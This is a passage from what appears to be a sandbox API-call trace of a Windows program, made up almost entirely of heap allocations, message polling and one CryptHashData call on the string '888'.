hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0266.445] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0266.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0266.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55008 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0266.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0266.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.447] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.448] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0266.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55018, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0266.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.449] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0266.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51c28 [0266.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51c28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0266.450] CryptHashData (hHash=0xa870d0, pbData=0x2e54f58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0266.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0266.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0266.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0266.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0266.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0266.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0266.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0266.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0266.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0266.454] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0266.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0266.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0266.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0266.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551a8 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.454] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55188 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0266.455] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51c70 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0266.455] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552e8 [0266.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0266.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0266.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0266.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.455] HeapFree (in: hHeap=0x970000, 